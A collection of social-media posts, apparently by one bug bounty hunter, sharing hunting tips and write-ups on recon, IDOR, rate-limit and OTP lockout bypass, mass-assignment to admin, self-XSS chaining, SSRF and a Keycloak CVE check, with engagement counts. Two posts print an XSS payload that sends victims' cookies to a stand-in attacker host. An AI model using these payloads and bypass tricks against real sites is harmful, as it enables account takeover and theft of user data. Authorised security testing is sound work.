I’ve noticed that most new folks who reach out for guidance in bug bounty feel overwhelmed early on trying to learn everything at once. That often leads to half-baked knowledge across multiple areas and slower overall progress. Here's what I recommend instead 👇 1/ Pick one vulnerability type and go all in. Master the ins and outs of that category - how it works, how it breaks, real-world examples, and ways to find it. Once you’ve got depth in one area, the rest will follow naturally. 2/ To put this into perspective, here’s a snapshot of the types of issues I’ve reported over the last 5 years - gradually expanding focus as I grew more confident: 2020: • Local cache issues • Rate limit issues on Login • Session invalidation • MFA bypass 2021: • Rate limit • MFA bypass • CSRF • IDOR • RBAC 2022: • CSRF • IDOR • RBAC • XSS • Business logic • Info disclosure 2023: • Everything from 2022 + • BBP automation • Cache deception • DoS Issues • Subdomain takeover • Auth bypass / misconfig • SQLi • SSRF • RCE 2024: • Everything from 2023 + • AI-related issues • Vhost misconfigurations 2025: • Everything from 2024 + • Many more new things that I will talk about soon :) 3/ There are more, of course, but this covers most of what’s worked well for me. The key takeaway: you don’t need to know everything. Play to your strengths. Stay consistent. And let your scope expand naturally. Hope this helps someone starting out 💪
16
76
391
22,905
Bug Bounty Tips: Struggling to find interesting stuff while hunting on an app? 🕵️‍♂️ Consider searching for old leftover API endpoints that might still work because they haven't been turned off or are used in older app versions. Here are 5 places to look for these APIs: 1️⃣ JS files: Check JS files for hidden APIs. Collect all APIs and focus on the ones that the app doesn't use. Test them for known issues. 2️⃣ Archived Links: Use tools like Waymore to get archived links. Look for weird links and test them for issues. 3️⃣ Archived JS files: Download old JS files using Waymore and get API endpoints from those. Older app versions might still have active and vulnerable APIs. 4️⃣ Android/IOS Mobile App: The mobile app might not be part of the bounty program, but its underlying API could be. Intercept app traffic using tools like Burp Suite, MITM, or Charles Proxy and check for interesting APIs. 5️⃣ Outdated Mobile Apps: Install old APKs and extract API endpoints from the Java source code for manual testing. Lesson: Don't give up too soon. If you're determined, explore all options—you might just find a bug others missed. 🐞💡 #BugBountyTips #SecurityTips #HackerOne #BugCrowd #InfoSec #StayMotivated
6
87
381
24,961
🔍 Question of the day: How can you effectively exploit Windows IIS targets? 🖥️ These targets are frequently underestimated, often dismissed due to the static blue screen they present. However, exploring these assets can often lead to substantial bounties, ranging from $500 to $5000, depending on their impact! 💰 Here are the steps to approach these targets: 1️⃣ Fingerprinting IIS - Start by using Nuclei to detect IIS servers. Check out this simple template: raw.githubusercontent.com/pr… 2️⃣ Shortname Scanner - Use the simple SNS (Shortname Scanner) to scan for folders and files. This user-friendly tool, developed by @sw33tLie, can be found here: github.com/sw33tLie/sns. If you locate a folder, you can reuse the same tool on that path recursively to detect subfolders, files, and more. 3️⃣ Leverage AI Power - Check out another tool, utilizing OpenAI, created by @monkehack, which predicts shortnames to help you deduce the full file and folder names: github.com/projectmonke/shor… 4️⃣ Exploitation - Once you've determined the full file or folder name, navigate to it for further exploitation. Here's an excellent tutorial from the legend himself @infosec_au talking about how to approach IIS targets: piped.video/watch?v=HrJW6Y9k… Lesson: Don't disregard Windows IIS targets just because they appear uninteresting. Misconfigurations are often overlooked and can lead to valuable bounties! 💡💻💰 #hackerone #bugcrowd #cybersecuritytips #bugbountytips #followformore #infosec #tips #security 🔒👨‍💻
24
90
376
38,380
🤖 Question of the day: How to set up Discord/Slack notifications for bug bounty findings? Looking to enhance your automation workflow? Ideally, you should have Discord/Slack/Telegram notifications configured for your bug bounty automation to get instant alerts on critical findings and take immediate action. Here's a step-by-step guide on setting up these notifications on Discord/Slack: 1️⃣ Go to github.com/projectdiscovery/… and install the tool with the following command: go install -v github[.]com/projectdiscovery/notify/cmd/notify@latest 2️⃣ Set up a configuration file using the provided example in the notify repository. Save it as $HOME/.config/notify/provider-config.yaml, and use the custom webhook URL generated from Discord/Slack for your notification channel. 3️⃣ Assuming you've created a channel named "sub-monitoring" on Discord, you can send notifications using piped (stdin) output. For example: For subfinder: subfinder -d hackerone[.]com | notify -id "sub-monitoring" You can do the same for other tools. Here's an example for nuclei: nuclei -l targets.txt -t newtemplates.yaml | notify -id "daily-monitoring" Feel free to reach out if you have any questions. #BugBountyTips #HackerOne #BugCrowd #SecurityTips #InfoSec 🐛🔍🛡️
8
93
356
26,980
Bug Bounty Tips: 🐛 Working on a wide-scope target and need to quickly pinpoint Interesting assets for your security assessment? Here's a nifty one-liner to help you do just that: 1️⃣ Create a list of your target/subdomains in 'targets.txt'. 2️⃣ Use the 'httpx' tool with the '-mr' flag to search for specific keywords. For example, you can look for the term 'register' in the responses using the command like: cat targets.txt | httpx -mr "register" 🔍 What happens next? You'll get a list of assets where the keyword 'register' appears in the HTTP responses. These assets often lead to registration or sign-up pages. Exploring these can reveal security vulnerabilities waiting to be discovered. ⚙️ Want to take it a step further? Build your custom keyword lists, including terms like 'login,' 'signup,' 'admin', and more. Tailor your searches to uncover assets of interest quickly. 🚀 I've used this simple yet effective technique countless times on expansive scopes to gain an edge in bug hunting. Stay proactive and stay secure! 💡💻 #CyberSecurity #bugbountytips #hackerone #bugcrowd #Infosec"
14
77
349
32,266
🔒 Bug Bounty Insight: Uncovering Overlooked Vulnerabilities If you're working on a target that offers user invitations via an invitation link, you might be surprised by how often these simple issues go unnoticed and unreported. In my early days, I reported over 10+ similar issues to programs, earning me quick wins and $$$! Here's how you can turn this feature into a reportable security issue: 1️⃣ Generate an invitation link and send it to your secondary account to join the team. 2️⃣ Accept the invitation. 3️⃣ Remove the secondary user from the team. 4️⃣ Try to rejoin the organization using the same invitation link, and prepare to be amazed! This issue allows an individual to rejoin the organization with the same role, even after removal. If the invitation link has no expiry and is not revoked on removal, it poses a security risk, granting access back to the organization with the same privileges as before. Takeaway: Simple issues often hide in plain sight. Get a little creative, and you'll uncover vulnerabilities all around you. Happy hunting! 💡💰 #BugBounty #Cybersecurity #HackingTips #HackerOne #BugCrowd #InfoSec #SecurityTips
8
70
344
30,336
🕵️ Bug Bounty Tips: How to maximize your bug bounty gains with a single finding? Found a cool issue on a website you're testing, like a hidden file or a tricky setup? 🎯 Don't just stop at reporting it once. If you don't search for the same problems on other target sites, you might be missing out on extra rewards! Here's the deal: Create a little script or a nuclei template for the issue you found, and use it on all your other targets to look for the same kind of problems. You'll be amazed at how often these issues pop up, and you can get paid multiple times for the same discoveries. I've done this before and reported more than 10 issues for the same problem on a program affecting multiple sites and also on different targets with the same Issue that earned me multiple rewards. What's the reporting strategy? 1️⃣ If all the issues are on the same target, report one and wait for them to fix it. They might see it as the same problem and close the others as duplicates. 2️⃣ Once they fix the first one, check if the other targets still have the problem. If they do, report those too. 3️⃣ Keep repeating steps 1 and 2! Bottom line: Turn your special findings, like unique files, lists of words, or tricky setups, into a pattern or script. Use it on all your targets to get the most rewards for your discoveries. 🚀💰 #BugBounty #InfoSec #Automation #Cybersecurity #BugBountyTips #HackerOne #BugCrowd
8
59
345
21,665
Question of the day: What subdomain takeover possibilities still exist? 🤔 Searching for subdomain takeovers? While they may not be as prevalent nowadays, it's crucial to keep these on your checklist as a handful of opportunities still exist. Here are the most common subdomain takeovers you should watch for: S3 Bucket Takeover 📦 Shopify Site Takeover 🛍️ EC2 Takeovers 🌐 DNS Zone Takeovers 🌐 *.trafficmanager[.]net - Edge Case 🌐 *.cloudapp[.]net 🌐 *.elasticbeanstalk[.]com - Edge case (Must have a region without a random string) 🌐 *.cloudapp.azure[.]com 🌐 *.azureedge[.]net - Edge case 🌐 *.herokuapp[.]com - Edge case 🌐 *.azurewebsites[.]net 🌐 While there may be a few more out there, these are the most common ones I've encountered, so I'm sharing this list with you. 🌐🔍 #BugBounty #SubdomainTakeover #SecurityTips #Infosec #BugBountyTips #HackerOne #BugCrowd
14
79
351
31,861
Show & Tell: Here's how I managed to escalate my role to an Internal admin, leading to a critical bounty! 🚀 Can you imagine the possibilities if you could tweak data within your profile or objects beyond the usual application flow? You're absolutely right—lots of bugs await discovery!!! Here's how I successfully elevated my role to an Internal admin, exposing admin functionalities, resulting in a mass PII leak and access to other sensitive Internal reports: 1️⃣ Navigated to target[.]com and accessed the sign-up page to create an account. 2️⃣ The sign-up page accepted three parameters: name, email address, and password. 3️⃣ As a practice, I closely monitored responses from critical functions to spot anything intriguing. Upon successful registration, here's the server's response: {"success": true, "user_id": 123, "name": "xxx", "email": "xxx@example.com", "isAdmin": false} 4️⃣ What would you do if you saw a response like that? You guessed it right! 5️⃣ Returned to the sign-up form, registered for a new account, and intercepted the following request during sign-up: {"name": "xxx", "email": "xxx@example.com", "password": "pass"} 6️⃣ Injected an additional parameter, "isAdmin": true, to test if the application would process it. Modified my request body to : {"name": "xxx", "email": "xxx@example.com", "password": "pass", "isAdmin": true} 7️⃣ BAM! The server processed my account as an admin, making me an Internal admin and revealing significant administrative functionality. Takeaways: Always scrutinize critical app requests/responses for anomalies. Don't hesitate to spend an extra minute testing the basics—you might be pleasantly surprised by the results! 💡🐛💰 #cybersecurity #bugbounty #bugbountytips #hackerone #bugcrowd #infosec
17
63
336
27,828
🚀Bug Bounty Tips: Act quickly to report issues related to CVE-2020-27838, as many vulnerable instances are still out there. I've identified over 100+ instances vulnerable to CVE-2020-27838 so far. A flaw was found in Keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication. Below is the PoC: https://yourtarget[.]com/auth/realms/master/clients-registrations/default/security-admin-console Scan your targets using the following command and ethically report any quick wins: nuclei -l targets.txt -t CVE-2020-27838.yaml Here's the link to the template - github.com/projectdiscovery/… Enjoy! #CybersecurityTips #BugBountyTips #SecurityTips #HackerOne #BugCrowd #Bounty #Tips
6
63
337
28,883
🌐Show & Tell: Here's how I bypassed account lockout limits on login with OTP, enabling me to take over any user's account. Here's yet another example of simple design issues that may exist but are most likely not being actively tested by researchers. TLDR: In a target app supporting login only with a phone from one specific country, the requests were made with the country code extension in the request body. This immediately prompted me to tinker with the request to see if there was anything unusual about how this was being interpreted at the backend. It looks like I was able to change the country code in the request body to bypass the account lockout limit and still get logged in to the same account. Here's how I approached this issue: 1️⃣ Navigated to the target app and entered a phone number to log in. An OTP was sent to the phone. 2️⃣ Intercepted the request and noticed two request body parameters: Phone and CountryCode. 3️⃣ Changed the "CountryCode" from +971 to +1, kept the same phone number, and entered the correct "OTP," and it logged me into my account with +971 country code. 4️⃣ This seemed a bit unusual, as it demonstrated that something was wrong since the country code was not being factored or was being stripped off while actually logging someone into an account. But it sort of made sense because the app supported only one country phone number. But then why add the country code to the request if it's not being used at all? 5️⃣ Came up with some creative ideas and said to myself, "Let's try brute-forcing the 4-digit OTP." Looks like the limit was set to 5 attempts after which the account would get locked out. 6️⃣ Came up with another wild imagination: What if the country code was somehow incorrectly being used here to determine what identifier to lockout? 7️⃣ Figured out that I could change the country code to +971, +1, +91, etc., while keeping the same phone number and brute force the OTP, and it never locked my account. This is possibly because there was a design flaw where they were checking for multiple failed attempts with both +[country code][phone#], something like that, while the country code was stripped off for actually validating the OTP with the phone number and during login, as we learned earlier. End result? This allowed me to circumvent the account lockout limits and take over any user's account by guessing the 4-digit OTP. Takeaways: It's important to keep an eye out for anything that stands out as unusual on your target app. For me, it was the fact that only one country phone number was supported. Then why were they using country codes in the request? Sometimes asking these questions to yourself can lead to unrealistic discoveries that may pay off. #CyberSecurity #BugBountyTips #SecurityTips #HackerOne #BugCrowd #Bounties #InfoSec 🛡️💻
17
59
324
25,344
I've often hesitated to participate in public bug bounty programs, mistakenly believing that if a program is public, it's likely already been thoroughly tested and is bug-free. However, I've been proven wrong. Over the past 2 years, I've learned valuable lessons that have humbled me. The key takeaways are: never assume, never hesitate, and never talk yourself out of taking action due to fear of failure. My manual submission rate has decreased from 10-15 critical bugs per month to just 2-3 criticals, yet the overall bounties are pretty much the same due to high paying programs. It's unreal how vulnerable some of the most common applications can be. My advice is to continually challenge yourself to improve. The journey can be tough, but there's always hope for success. There’s always a greater than 0% chance of something if you’re trying hard enough :) Most of us are on the same skill sets, with some performing better than others. The key difference lies in persistence and a never-give-up attitude. Invest as many hours as possible, and seize this opportunity to make your mark. Best of luck!
14
47
325
19,453
Bug Bounty Tips: Here's how you can escalate XSS Issues to an Account Takeover💸 Have you Identified a XSS Issue? Don't be too quick to report it with alert(1) or alert(document.cookie) for a Medium payout. Here's how you can escalate XSS Issues to an ATO for much higher bounties: 1️⃣Always try Exfiltrating session based cookies to your attacker controlled server. Here's a simple payload you can use to demonstrate ATO: "><img src="x" onerror="document.location.href='https://attackersite(.)com?cookies=' + document.cookie + ''"> This payload exfiltrates user cookies and forwards them to an attacker-controlled site. Create a Proof of Concept (PoC) video showing how these cookies can hijack a user's session e.g. send a request to any authenticated API and demonstrate that the cookies work. 2️⃣If cookies are set as HTTPOnly, try escalating the Impact by performing sensitive client-side actions, such as changing a user's email address or password leading to an account takeover 3️⃣If sensitive client-side actions aren't possible, check for leaked session cookies or tokens in the server's responses on all pages. Use your XSS payload to exfiltrate these to your attacker controlled server to get an account takeover 4️⃣If no session cookies or tokens are found on any pages, check the browser's local storage for stored session tokens and accordingly craft your XSS payload to exfiltrate these to your attacker controlled server leading to an account takeover. 🚀Lesson: Always look for ways to escalate XSS Issues to account takeovers as this could potentially boost the bounty amount for that report by 2-10x! 💡 #BugBounty #InfoSec #xss #crosssitescripting #Cybersecurity #BugBountyTips #HackerOne #BugCrowd #SecurityTips
9
66
314
17,267
Sharing my experience with @Netlas_io:🕵️‍♂️ I've integrated Netlas.io into my automation framework to retrieve asset IPs, subdomains, and associated domains. it has led me to discover numerous new assets, facilitating successful subdomain takeovers and Identifying additional security issues along the way. Additionally, I've been using Netlas.io for identifying vulnerable services using keywords, titles, or favicon hashes, a strategy that has yielded significant success. Here's how you can leverage some of these services Scenario 1: If you've identified a service vulnerable to a specific issue and wish to identify other affected targets, Netlas.io allows you to search for similar targets using keywords found in the response body. For example, by searching for the keyword "hubspot" in the response body, you can uncover all targets sharing this characteristic. Example: https://app[.]netlas[.]io/responses/?q=http.body:(hubspot)&page=1&indices= Scenario 2: In the event of a new 0-day exploit circulating, and you're in search of specific instances like Jenkins based on request headers, Netlas.io provides the means to quickly pinpoint such instances. Example: https://app[.]netlas[.]io/responses/?q=http.headers.x_jenkins:* OR http.headers.x_jenkins_cli2_port:* OR http.headers.x_jenkins_session:*&page=1 Scenario 3: Need to locate subdomains efficiently? You can use something like Example: https://app[.]netlas[.]io/domains/?indices=&page=1&q=domain%3A%28domain%3A%2A.paypal[.]com%29 Scenario 4: For broad investigations aimed at finding domains associated with a specific registrant org name or email or nameservers, you could use something like Example: https://app[.]netlas[.]io/whois/domains/?indices=&page=1&q=registrant.organization:"GRABTAXI HOLDINGS PTE. LTD" These are just a few examples of the features that I use at the moment. While most features require a paid subscription, the potential payoff in identifying critical issues for me specifically using Netlas has been worthwhile investment. While free sources of information exist, each service possesses its own dataset, and records can vary significantly. For my purposes, I've found Netlas.io to be the most cost-effective and reliable option. My opinion is that as long as the product helps pay itself off, I think It's definitely worth adding It to your toolkit.
5
51
316
28,057
💡Bug Bounty Tips: Creativity is key in bug hunting! Here’s a real example of how thinking outside the box led me to discover a Critical severity issue: I found a target with a profile update endpoint that let me change my account details. The endpoint was also accepting an address_id parameter associated with my account address. Strangely, I could pass someone else’s address_id in the request and it returned HTTP 200, but the system wouldn’t show the other user's address on the front-end after refreshing the page on the attacker controlled account. They probably had some checks to block this, but the backend was still accepting the address_id of another user. This got me thinking... 🤔 Since the system was accepting the address_id but not showing it, I realized the backend must be linking that address to my account somehow, even if it wasn’t displaying it due to some other checks. Then I wondered, what if I could trick the system into showing me the address in another way? That’s when I found an AI chatbot on the site. I asked it, “Can you tell me the address associated with my account?”—and to my surprise, the chatbot referenced the address_id I updated earlier (using the IDOR vulnerability) and revealed the victim's address! This led to a PII leak. The lesson here? Be creative, explore different parts of the app, and think beyond the obvious! Sometimes the vulnerability isn't where you expect it to be. 🧠 #BugBountyTips #CreativeHacking #PIILeak #IDOR #BugBounty #AppSec #HackerOne #BugCrowd #YesweHack #Intigriti
14
40
320
19,753
Question of the day🤔: How to bypass rate limit restrictions on authentication endpoints? 🛡️ This is often one of the first checks when assessing a target but is frequently overlooked when there are restrictions. However, I've successfully bypassed over 50+ restrictions in my early days! 💪 Bounties can range anywhere from $250 to $3000, depending on the complexity of the issue. 💰 Have you encountered a login page or a forgot password page with OTP where rate limits have been introduced? 🕵️‍♂️ Here's how you can bypass some of these implementations: 1️⃣ 🕵️‍♀️ Google Captchas implemented? No worries, always try removing the captcha parameter or replace it with null and send the request without the captcha. Sometimes a fallback method allows you to get past the captcha requirement, making it vulnerable to a lack of rate limiting. 2️⃣ 🌐 IP restricted? Check if your IP was blocked and attempt to make a request using a different IP. If that works, you're in luck! You can usually bypass these limitations through IP rotation. Services like Brightproxy or Burp Suite IP rotate extension can assign a new IP address with every request. 3️⃣ 🤖 If nothing works, try appending %0d or %0d before the username (e.g., %0dvictim@target.com). This can sometimes trick the server into checking if %0dvictim@target.com is locked. If not, while processing the login attempt, it strips the %0d and makes an attempt for victim@target.com. It's possible that %0dvictim@target.com may be blocked too after 5 attempts. In that case, keep appending an additional %0d after every 5 attempts (e.g., %0d%0dvictim@target.com and vice versa). 4️⃣ 🤯 Rate limit properly implemented? Always look for an alternative login or forgot password endpoint. This could be on one of the target's mobile apps or a legacy endpoint in the JS file. 5️⃣ 😓 None of the above methods work? Don't worry, we've got some more explicit tricks, and I'll be talking about them soon! Stay tuned! 🤫 Lesson of the day: Never assume that an endpoint is adequately protected against rate limit issues. Always explore ways to penetrate/bypass the implementation, and you'll be surprised at the results and win some nice bounties! 💎💰 #SecurityTips #BugBounty #HackerOne #BugCrowd #InfoSec #BugBountyTips 🔒🔍🔓🦠🕶️
11
52
316
26,617
Show & Tell: Exploiting an Unusual XXE Vulnerability on a Target App 🕵️‍♂️💻 1/ Often overlooked, XXE vulnerabilities can hide in plain sight, especially in apps seemingly devoid of XML calls to the backend. In this thread, I'll walk you through how I discovered and exploited such an issue in one of my pentest engagements.
18
64
314
31,777
🚀 Unspoken Bug Bounty Rules – From many years of failures & experience! 🕵️‍♂️ Got a similar bug across multiple assets but fear the program might count them as one for payout despite requiring multiple fixes? ✅ Report one at a time. Wait for a bounty. Then submit the next one. ⚖️ Think your report is High/Critical but doesn’t align with CVSS? ✅ Focus on demonstrating Impact. Reference previous reports, screenshots of policies, and clarify why severity should be higher. 🔗 Reporting a subdomain takeover but worried it'll be fixed before triage? ✅ Archive it via Wayback Machine for solid evidence. If they still reject it, at least you 'll have evidence and can fight back and most Importantly won’t have to walk away with a Not Applicable (NA). 🔢 Reporting an IDOR on UUIDs but getting a "Low" payout due to high complexity? ✅ Show how multiple UUIDs can be discovered via web archives, dorks, and OSINT. If IDs are easily accessible, it strengthens your case. 💨 Reporting a Cache Poisoning DoS, but DoS is out of scope? ✅ Never call it DoS! Instead, frame it as Cache Poisoning to Arbitrary Content Injection and clearly explain your attack scenario. 🔒 Working on a program that has both a VDP & BBP? ✅ Submit to VDP initially, but if you prove your skills, politely request an invite to their private BBP via comments. 🤝 Love hunting on a program? Want to do more with them? ✅ Build relationships with program managers & triagers. Being polite and engaging on special occasions never hurts. 📢 Disagree with CVSS or impact assessment? ✅ Instead of frustrated follow-ups, provide detailed reasoning & impact proofs. A well-structured response is likely to better attention from H1 triage and program managers. 🚪 Not happy with how a program treats you despite your contributions? ✅ There are 1000+ programs out there. Take a break and revisit later—management changes, and things improve! 💡 I'm sure there are more such unspoken bug bounty insights. These are just a few that I've learned the hard way. Hope it helps! Please feel free to add :)
9
62
304
17,183
🤔 Question of the Day: How to approach restricted bug bounty programs with a single site in scope? Many ask me, "How do you discover issues on bug bounty programs with only one target site in scope? What sets you apart?" While most shy away from such targets, I employ a few extra strategies that help me uncover more issues. Here are the top 5 approaches I use on these targets: 1️⃣ Check for Mobile Apps: Even if the mobile app isn't in scope, it's worth inspecting. I've found many programs with Android apps not explicitly listed in scope, yet they call the same in-scope APIs or target sites. This reveals overlooked endpoints, leading to more reported security issues. 2️⃣ Subdomain Takeovers: Unless explicitly excluded, programs often accept these issues, even when they've specified only the root domain as in-scope. 3️⃣ Analyze JavaScript Files: Install and analyze all JS files, including archived ones. The goal is to identify as many endpoints as possible, including legacy ones that may still be active, presenting numerous opportunities to find security issues. 4️⃣ Mobile App API Endpoints: Install all versions of mobile apps and extract endpoints from the Java source code. This reveals endpoints used across various releases, uncovering many testable endpoints and potential security bugs. 5️⃣ Explore Premium Features: Consider obtaining a paid account on these services. Free trial schemes or money-back guarantee packages are often available. Treat it as a $50 investment to explore premium features. You'll be amazed at the possibilities a paid account can open up for finding bugs. Takeaways: Don't give up on restricted targets; there's more beneath the surface. Think creatively, and explore areas others might overlook. You'll be surprised by the results! 🚀💡 #BugBounty #Cybersecurity #HackerTips #InfoSec #BugBountyTips #SecurityTips #InfoSec
14
43
287
33,722
🔒 Question of the day: What are the common vulnerabilities in Shopify stores? It's common to assume that Shopify stores are safe targets, but over the years, I've encountered various misconfigurations that can lead to bounties ranging from $250 to $5000 💰. Here are some common issues you might find on a third-party site using a Shopify store: 1️⃣🔑Multipass Login: In some cases, Shopify stores are configured to allow you to log in using the target app's Single Sign-On (SSO) system. If the primary app doesn't require email verification during account creation, you might be in luck. Here's how it works: Imagine someone has placed an order with a "Guest" checkout, using an email like victim@example(.)com. If the attacker can create an account using victim@example(.)com and log in without email verification, they gain access to other user's orders. This could lead to a significant Personally Identifiable Information (PII) disclosure issue. Always be vigilant for this potential vulnerability! 2️⃣⚠️XSS Vulnerabilities: Shopify has over 8000+ third-party plugins/themes, which can be vulnerable to XSS issues. Don't assume it's safe just because it's Shopify. Depending on the third-party integrations, you might encounter XSS vulnerabilities. Be thorough in testing all parameters for XSS, particularly DOM and PostMessage issues. 3️⃣📦Custom Apps: Some Shopify stores use in-house apps or custom APIs that may leak sensitive information about store orders. Investigate all functionalities used by the app, and you may discover misconfigurations or IDOR issues that could earn you bounties. 🏹Lesson learned: Don't overlook Shopify store targets simply because they're on Shopify. Many integrations can introduce vulnerabilities, making Shopify stores ripe for finding bounties. 🕵️‍♂️🛡️ #hackerone #bugbountytips #securitytips #cybersecurity #infosec #bugcrowd #follow 🌐
22
51
294
35,756
Retweeting as previous post got shadow banned. Bug Bounty Tips: Here's how you can escalate XSS Issues to ATO💸 Have you Identified a XSS Issue? Don't be too quick to report it with alert(1) or alert(document.cookie) for a Medium payout. Here's how you can escalate XSS Issues to an ATO for much higher bounties: 1️⃣Always try Exfiltrating session based cookies to your controlled server. Here's a simple payload you can use to demonstrate ATO: "><img src="x" onerror="document.location.href='https://yoursitesite(.)com?cookies=' + document.cookie + ''"> This payload exfiltrates user cookies and forwards them to your site. Create a Proof of Concept (PoC) video showing how these cookies can be used to takeover a user's session e.g. send a request to any authenticated API and demonstrate that the cookies work. 2️⃣If cookies are set as HTTPOnly, try escalating the Impact by performing sensitive client-side actions, such as changing a user's email address or password leading to ATO 3️⃣If sensitive client-side actions aren't possible, check for leaked session cookies or tokens in the server's responses on all pages. Use your XSS payload to exfiltrate these to your controlled server to get an ATO 4️⃣If no session cookies or tokens are found on any pages, check the browser's local storage for stored session tokens and accordingly craft your XSS payload to exfiltrate these to your server leading to an ATO. 🚀Lesson: Always look for ways to escalate XSS Issues to ATO as this could potentially boost the bounty amount for that report by 2-10x! 💡 #BugBounty #InfoSec #Cybersecurity #BugBountyTips #HackerOne #BugCrowd #SecurityTips
9
97
340
20,990
Found an interesting bug a while back and thought I’d share it here 👇 I came across an unused API endpoint inside a JavaScript file - `/api/users/<user_id>/activities/`. It wasn’t being called anywhere within the app, so naturally, I tried to hit it manually using my JWT from the web app. The result? 403 Forbidden. No access. Later that day, I downloaded the mobile app for the same target just to poke around for some other Issues. While logging in, I noticed something odd - the JWT generated by the mobile app was noticeably bigger than the one from the web. As a next step I threw it into jwt[.]io for a quick look and to my surprise the token had way more scopes and permissions granted compared to the web version even though It was for the same account.. At this point I had a wild theory which I was pretty sure wouldn't work... But as you can Imagine I went back to that `/api/users/<user_id>/activities/ endpoint, but this time used the mobile-generated JWT... and boom it worked. I had full access to PII data for other users. The endpoint was probably gated by permissions that only mobile clients were issuing. Moral of the story? Don’t just test with the web client. Always compare JWTs from different platforms - web, mobile, maybe even desktop. Misconfigured scopes or overly permissive mobile tokens can open up unimaginable possibilities.
9
44
298
16,156
🌐Bug Bounty Tips: Working on a wide-scope target? Here's how you can discover all related assets! 🕵️‍♂️ Working on a comprehensive bug bounty program? Here are my top 5 strategies to identify all related assets: 1️⃣ IP Ranges: Discover IP ranges using the target's ASN. Visit bgp.he.net/AS33848#_prefixes for a comprehensive list. 2️⃣ Favicon Hash: Use tools like favicon-hash.kmsec.uk/ to obtain the favicon hash of your target site. Find similar sites using the hash with a Shodan search, e.g., shodan.io/search/report?quer… 3️⃣ DNS Records: Leverage tools like securitytrails.com to uncover DNS records. Search for domains pointing to the same name servers or MX records. 4️⃣ Associated Domains: Explore domains associated with your target based on factors like registrant orgs and addresses. 5️⃣ Acquisitions: Check for acquisitions via crunchbase.com/ and gather all related domains. Apply steps 1 to 5 to these as well. Feel free to share your ideas in the comments! 🚀 #BugBounty #Cybersecurity #BugHunting #BugBountyTips #SecurityTips #InfoSec #HackerOne #BugCrowd
8
74
276
28,081
Although this is a known technique, I wanted to share it as I’ve recently encountered several Lambda-based SSRFs where I could exfiltrate environment variables and headers containing sensitive secrets and critical infrastructure data. Do you have an HTTP pingback or control over a URL parameter that returns a response based on the passed URL, but you’re unsure where to go next? You can easily verify if your SSRF is on a Lambda instance by hitting: localhost:9001/2018-06-01/runtime/invocation/next. Additionally, the Lambda function may have whitelisted internal IP ranges, allowing you to expand your attack surface by enumerating internal services and endpoints. I’ll share more on this in an upcoming tweet. #BugBountyTips #SSRF #AWS #Security #Recon #BugCrowd #HackerOne
8
33
265
15,703
💥 Simple HTTP Parameter Pollution escalated to PII Leak → 4-Digit Bounty! ✅ {"proxyPayload":"Limit=20&userID=<attacker_ID>"} → 200 OK ❌ {"proxyPayload":"Limit=20&userID=<victim_ID>"} → "errorMessage":"Forbidden Access" ✅ {"proxyPayload":"userID=<victim_ID>&Limit=20&userID=<attacker_ID>"} → 200 OK Here’s what happened: 🔹 The first server validated the second userID in the request for access control. 🔹 The secondary system (context) used the first userID to retrieve PII belonging to the victim. This mismatch allowed me to validate my attacker userID while accessing the victim’s data. End result? Access control bypass → Mass PII Leak 🚨 Lesson: Test how APIs handle duplicate parameters, especially in secondary contexts where different parts of the system may interpret them inconsistently. #BugBountyTips #Hacking #HTTP #BugCrowd #HackerOne #Intigriti #YesWeHack
6
38
262
15,071
Found a pretty cool feature on @Netlas_io called the "Attack Surface Discovery Tool" to quickly map the external attack surface for large-scope targets. This helped me find some quick wins during a recent bug bounty engagement. What’s awesome? It provides a complete overview of an organization's external attack surface. The best part? You can use multiple identifiers to search for correlated data, such as: 🔍 Domain Name 🔍 ASN 🔍 IP Address 🔍 CIDR 🔍 Organization Name 🔍 Person 🔍 Favicon Here's how it can help in bug bounty hunting with different correlation points: 📌 Domains with similar Organization name: Identifies all other associated root/sub domains via WHOIS, PTR records, nameservers, IP ranges, etc. 📌 Networks with the Same Organization: Maps associated networks, IP ranges, ASNs, and more tied to the organization. 📌 Hosts from Responses by Organization: Discovers domain names, TXT records, mail servers, nameservers, ASNs, WHOIS emails, etc., linked to the target. 📌 Abuse Emails/ASNs/DNS Records/SSL Certs: Leverages unique identifiers for uncovering related external facing assets. And many more correlation data points! #Netlas #BugBountyTips #HackerOne #BugCrowd #Intigriti #YesWeHack
2
39
258
18,154
🔒 Question of the day: How to exploit Self-Stored XSS Issues? Have you ever stumbled upon a self-stored XSS but it's just for your session? Well, you're in for a surprise! Self XSS issues might be overlooked because they are not accepted by programs, but they can be quite the treasure, netting you anywhere from $250 to $1000, depending on the impact. Assuming you've discovered a vulnerability like this, usually in profile pictures, addresses, or names, etc. Here's how you can exploit these Issues: 1️⃣ First, ensure the target app's login functionality is vulnerable to CSRF. You can chain a Login CSRF to forcibly log a victim into your attacker account that houses the self-stored XSS payload. This transforms it into Stored XSS, letting you run malicious JS within the victim's session context. 2️⃣ Another trick up your sleeve: CSRF with a password reset. If the system auto-logs in after a successful password reset, you can forcibly log a victim into the attacker-controlled account to execute the self XSS payload. 3️⃣ Check for OAuth login endpoints that might be vulnerable to CSRF. Use them to forcefully log users into the attacker account for executing your malicious XSS payload. 4️⃣ Some sites use session tokens or other redirects to log in users, and these are often susceptible to CSRF. Chain them to exploit the SELF XSS by forcefully logging victims into your attacker-controlled account. 5️⃣ If none of the above works. Don't worry! We have more explicit tricks up our sleeves, which we'll tweet about soon! Takeaway: Don't underestimate self-stored XSS issues. They can be chained and exploited for substantial rewards. 💰💻 #HackerOne #BugCrowd #BugBountyTips #SecurityTips #TipOfTheDay #QuestionOfTheDay #InfoSec #Follow
13
43
239
24,790
Here’s how I discovered a critical issue on a wide-scope program using @netlas_io 👇 The target had a pretty generic login flow via a 3rd-party service with specific keywords. It was pretty much using the same codebase reused across multiple assets. I used netlas.io to do a quick response search with a keyword unique to my target's login page. Here's the query I used: http.body:("<keywords_from_login_page_of_my_target>") The above search returned an EC2 IP with port 80/443 open. This IP had no direct connection to my target via CIDR, WHOIS, SSL certs, or domains and looked completely unaffiliated with the target I was hunting on. But I could tell from the login flow immediately that it was identical to the one used by the company. Turns out the exposed Instance had sign up enabled and that allowed me to login and dropped me straight into an admin panel exposing massive PII and internal dashboards. I suppose the key takeaway here is to not limit your recon to basic organization-wide searches like WHOIS, CIDRs, or SSL certificates. Sometimes, targeting unique application fingerprints such as specific UI text or JavaScript snippets can help uncover untracked assets.
5
37
244
14,418
